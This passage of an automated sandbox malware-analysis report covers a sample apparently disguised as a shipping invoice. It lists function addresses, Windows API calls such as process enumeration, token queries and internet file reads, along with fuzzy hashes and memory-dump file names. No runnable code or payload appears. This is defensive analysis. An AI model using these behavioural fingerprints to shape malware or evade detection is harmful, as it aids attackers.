Opcode Fuzzy Hash: e12f591899ab5fe694587329808f467f44db57577b3d8a354908223816b57777
Instruction Fuzzy Hash: 2341D038A11205DFEB16CF68D484EA9BBF5FF48318F0645A8EA249B255C334E941CFD0

Function 012D16DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 012D16EB

Part of subcall function 012A3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 012A3A57
Part of subcall function 012A3A3D: GetCurrentThreadId.KERNEL32(00000000,?,00000000,00000000,?,012A25B3), ref: 012A3A5E
Part of subcall function 012A3A3D: AttachThreadInput.USER32(00000000,?,00000000), ref: 012A3A65

GetCaretPos.USER32(?), ref: 012D16FF
ClientToScreen.USER32(00000000,?), ref: 012D174C
GetForegroundWindow.USER32 ref: 012D1752

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 38f896ed4eb8f595bf004ef321c6aaf782c11da1572081ea43524c138cf3de15
Instruction ID: 56aa158d1cec437b1f7ecda8dd5f18d6da2a271f5011427be25c6f7d1fb9dd19
Opcode Fuzzy Hash: 38f896ed4eb8f595bf004ef321c6aaf782c11da1572081ea43524c138cf3de15
Instruction Fuzzy Hash: 82317075D1124AAFD704EFA9C880CBEBBFDEF58204B5180AAE415E7211E735DE45CBA0

Function 012AD4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 012AD501
Process32FirstW.KERNEL32(00000000,?), ref: 012AD50F
Process32NextW.KERNEL32(00000000,?), ref: 012AD52F
CloseHandle.KERNEL32(00000000), ref: 012AD5DC

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: feaa48a4f7c859cf5eb7cb43bfa3ce6b6730e3ad6179aa60ae3060a087a7a4ad
Instruction ID: c6f6451d25da6b43f1637469a7c6498a4f97ad0f702869d3927290647c104f70
Opcode Fuzzy Hash: feaa48a4f7c859cf5eb7cb43bfa3ce6b6730e3ad6179aa60ae3060a087a7a4ad
Instruction Fuzzy Hash: 7331B1721183069FD305EF68D884ABFBBF8EF99344F40092DF681831A1EB719584CB92

Function 012D8FC9 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 01259BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 01259BB2

GetCursorPos.USER32(?), ref: 012D9001
TrackPopupMenuEx.USER32 ref: 012D9016
GetCursorPos.USER32(?), ref: 012D905E
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,01297711,?,?,?), ref: 012D9094

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 6529db7131fa2606a9f8d44532ad63c814287f987367b8ef69777291e4a01601
Instruction ID: 0764ad7167bdec5ae7379abb53fafb1a7877718ac73e3ed41e11469d3916d848
Opcode Fuzzy Hash: 6529db7131fa2606a9f8d44532ad63c814287f987367b8ef69777291e4a01601
Instruction Fuzzy Hash: 3321BF35610018EFDF259FA8E848EFA7FB9EF89355F048159FA0597251C3319990DBA0

Function 012AD2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,012DCB68), ref: 012AD2FB
GetLastError.KERNEL32 ref: 012AD30A
CreateDirectoryW.KERNEL32(?,00000000), ref: 012AD319
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,012DCB68), ref: 012AD376

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: 09091c357d49de56082c272533bf8995026139b402afc66ba3c31ef49ad43a1d
Instruction ID: c676ec8b4ec7fcec06824004ffb89f484ce37217c73275da1293f05b22ccbe18
Opcode Fuzzy Hash: 09091c357d49de56082c272533bf8995026139b402afc66ba3c31ef49ad43a1d
Instruction Fuzzy Hash: 0F21E5305253069F8710EF68D88446FBBE4EF5A324F504A1DF599C7291D730D945CF92

Function 012A1571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 012A1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 012A102A
Part of subcall function 012A1014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 012A1036
Part of subcall function 012A1014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 012A1045
Part of subcall function 012A1014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 012A104C
Part of subcall function 012A1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 012A1062

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 012A15BE
_memcmp.LIBVCRUNTIME ref: 012A15E1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 012A1617
HeapFree.KERNEL32(00000000), ref: 012A161E

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: e3a0ca78fc9c45eeff1f7b5f1cd56f3295dc8634d86ecf1db2f3e7c84146da83
Instruction ID: 2e2dae72ff0bb3d235deaf6b17eda597de62ce4b7c6f76b45e3ddc601c127b0f
Opcode Fuzzy Hash: e3a0ca78fc9c45eeff1f7b5f1cd56f3295dc8634d86ecf1db2f3e7c84146da83
Instruction Fuzzy Hash: E721B371E51109EFDF10CFA8D948BEEBBB8EF44365F484459D541EB240E730AA19CB50

Function 012D2782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 012D280A
SetWindowLongW.USER32 ref: 012D2824
SetWindowLongW.USER32 ref: 012D2832
SetLayeredWindowAttributes.USER32 ref: 012D2840

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: 7b414b0e0b6aea5f0141329a97873f3509ccf1296abaa09a64e21d6ddcf1951d
Instruction ID: 29ce1251638f9900947e6f3f822abd056c32102b2288344420246396d83ef6eb
Opcode Fuzzy Hash: 7b414b0e0b6aea5f0141329a97873f3509ccf1296abaa09a64e21d6ddcf1951d
Instruction Fuzzy Hash: 6A21F131615112EFE7289B28D844FAA7B95EF85324F158258F526CB2D1CB71EC42C7E0

Function 012BCE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,00000400,?), ref: 012BCE89
GetLastError.KERNEL32(?,00000000), ref: 012BCEEA
SetEvent.KERNEL32(?,?,00000000), ref: 012BCEFE

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ErrorEventFileInternetLastRead
String ID:
API String ID: 234945975-0
Opcode ID: cbcc3d125ab302669c8599bbbe5b21c3b5fffbd8948063a4ecb5ead80c024eb9
Instruction ID: 158610fdf060b1439409be1feb1c52b94ecd3e652926e7b736264bbf3836692b
Opcode Fuzzy Hash: cbcc3d125ab302669c8599bbbe5b21c3b5fffbd8948063a4ecb5ead80c024eb9
Instruction Fuzzy Hash: BD219DB1910306DBEB30DFA9D989BA77BFCEB50394F10442EE64692141E770EA54CBA0

Function 012A78F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON

Download Yara Rule

APIs

Part of subcall function 012A8D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,012A790A,?,000000FF,?,012A8754,00000000,?,0000001C,?,?), ref: 012A8D8C
Part of subcall function 012A8D7D: lstrcpyW.KERNEL32(00000000,?), ref: 012A8DB2
Part of subcall function 012A8D7D: lstrcmpiW.KERNEL32(00000000,?,012A790A,?,000000FF,?,012A8754,00000000,?,0000001C,?,?), ref: 012A8DE3

lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,012A8754,00000000,?,0000001C,?,?,00000000), ref: 012A7923
lstrcpyW.KERNEL32(00000000,?), ref: 012A7949
lstrcmpiW.KERNEL32(00000002,cdecl,?,012A8754,00000000,?,0000001C,?,?,00000000), ref: 012A7984

Strings

cdecl, xrefs: 012A797B

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: cda2b3768666807a9ff02ddc40f943842aee7df534fc31a8791671681005e664
Instruction ID: 2d203e2980c690c9dfce488117dde2f6018323a64b8d6838d85c5d2719b6d845
Opcode Fuzzy Hash: cda2b3768666807a9ff02ddc40f943842aee7df534fc31a8791671681005e664
Instruction Fuzzy Hash: 5611E63A211343ABDB259F39D844E7A77E9FF85750B80402FEA46C7258EB32D811C7A5

Function 012D5660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001060,?,00000004), ref: 012D56BB
_wcslen.LIBCMT ref: 012D56CD
_wcslen.LIBCMT ref: 012D56D8
SendMessageW.USER32(?,00001002,00000000,?), ref: 012D5816

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: MessageSend_wcslen
String ID:
API String ID: 455545452-0
Opcode ID: 2cab04ebfb3b298dc5050c785ab3af9119c2b7cf0c07d0ee33932d35bfd1572d
Instruction ID: 2aec4abe406f2e7b3268ccef2fbb9f9e242903dd478864063cced595261ad72b
Opcode Fuzzy Hash: 2cab04ebfb3b298dc5050c785ab3af9119c2b7cf0c07d0ee33932d35bfd1572d
Instruction Fuzzy Hash: 1811B771A202099AEB209F65DC85AFE7BBCFF11664B10402AEA15D6081D7F09544CFA0

Function 01271D09 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f7db0c06a18b474e8cc9b91daebb2acf1efbc0c49555c2cf55afd536942eb69
Instruction ID: ea135f1adedf520d15704aa046cfa050c11d93247c0a21f77379fda8a6c9aceb
Opcode Fuzzy Hash: 6f7db0c06a18b474e8cc9b91daebb2acf1efbc0c49555c2cf55afd536942eb69
Instruction Fuzzy Hash: 62018FB262A617BEFB2125787CC1F27661CDF413B8B340329F621A11C5DB708C608670

Function 012A1A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 012A1A47
SendMessageW.USER32(?,000000C9,?,00000000), ref: 012A1A59
SendMessageW.USER32(?,000000C9,?,00000000), ref: 012A1A6F
SendMessageW.USER32(?,000000C9,?,00000000), ref: 012A1A8A

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 71e1381ed892319632c84bc6950ca5e6bacdbbe23baa4c44f6534536a9e13922
Instruction ID: 0f1588ca317affb475ed508b99a4dff66dbf821be33f6d26c85e908de812b13c
Opcode Fuzzy Hash: 71e1381ed892319632c84bc6950ca5e6bacdbbe23baa4c44f6534536a9e13922
Instruction Fuzzy Hash: 95113C3AD00219FFEB11DBA4C985FADBBB8EB04750F200091E600B7295D6716E50DB94

Function 012AE1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 012AE1FD
MessageBoxW.USER32 ref: 012AE230
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 012AE246
CloseHandle.KERNEL32(00000000), ref: 012AE24D

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: a2a2e898024abb15f3472bc2c4f240a00c9cbe145baf2d2fc8d98dc0b81b840a
Instruction ID: 60e6f899b60f5acced524d6ba6712ae9a46e87414eafe52e54817adcc5243836
Opcode Fuzzy Hash: a2a2e898024abb15f3472bc2c4f240a00c9cbe145baf2d2fc8d98dc0b81b840a
Instruction Fuzzy Hash: 2311C876D14259BFD7219BB8EC09ADE7FACDB45320F054659FA14D3284D6B0C90487A0

Function 0126D1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,?,0126CFF9,00000000,00000004,00000000), ref: 0126D218
GetLastError.KERNEL32 ref: 0126D224
__dosmaperr.LIBCMT ref: 0126D22B
ResumeThread.KERNEL32(00000000), ref: 0126D249

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Thread$CreateErrorLastResume__dosmaperr
String ID:
API String ID: 173952441-0
Opcode ID: 152f9e17f21947883fc822e409f1e413f3497417a6ad18c964e14e702308faed
Instruction ID: 478c2fb0aac8bd37e5288c0cf197276a4c2d476aed8e45bc8f15f0ca1ce001f5
Opcode Fuzzy Hash: 152f9e17f21947883fc822e409f1e413f3497417a6ad18c964e14e702308faed
Instruction Fuzzy Hash: 0201DB3692510DBBDB215BE5DC09BBA7B5CDF81330F100219F965951D0CF71C591C7A0

Function 0124600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32 ref: 0124604C
GetStockObject.GDI32(00000011), ref: 01246060
SendMessageW.USER32(00000000,00000030,00000000), ref: 0124606A

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: e8dffe7816359b9d3e37bf683cf46afad27d218f78eb5c7c611ffe08552cab19
Instruction ID: db69d9e2a1495af9010ac3584dfe30e10b800cbce26b95a71eb1751c021122b4
Opcode Fuzzy Hash: e8dffe7816359b9d3e37bf683cf46afad27d218f78eb5c7c611ffe08552cab19
Instruction Fuzzy Hash: F21179B2512509BFEF2A5FA4DC48AEABB7DFF093A5F001206FB1452004C7329C60DBA0

Function 01263B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 01263B56

Part of subcall function 01263AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 01263AD2
Part of subcall function 01263AA3: ___AdjustPointer.LIBCMT ref: 01263AED

_UnwindNestedFrames.LIBCMT ref: 01263B6B
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 01263B7C
CallCatchBlock.LIBVCRUNTIME ref: 01263BA4

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction ID: 274ae23e70a8578e179c9e882a2c684bdf92067d92d4ce6d3228515da31efce9
Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction Fuzzy Hash: 2F01E93211014ABBDF12AE99CC45DEB7F6DFF59754F044014FE4856160D732E8A1EBA0

Function 012A7464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 012A747F
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 012A7497
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 012A74AC
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 012A74CA

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: db175da33a6b7bc76a3a055500f9789750ec30fb88e457df55385496740b117f
Instruction ID: 635c28202b77c5f0bef0c7ab3d001e439d4a2369a74f61d2eaf3829b945ad0b8
Opcode Fuzzy Hash: db175da33a6b7bc76a3a055500f9789750ec30fb88e457df55385496740b117f
Instruction Fuzzy Hash: A1116DB5662305AFE7308F24ED09B927FFCEB00B04F40856EA656D6181D7B1E904CF64

Function 012AB0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,012AACD3,?,00008000), ref: 012AB0C4
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,012AACD3,?,00008000), ref: 012AB0E9
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,012AACD3,?,00008000), ref: 012AB0F3
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,012AACD3,?,00008000), ref: 012AB126

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: b5b1eb9e33ccbd759866b8d7458ca3a81743c3328503a30bbf22b4ee2bd035c7
Instruction ID: ff22be82400f3a48e021ae9c1ae693cb0136c461778d244232b14652a658847a
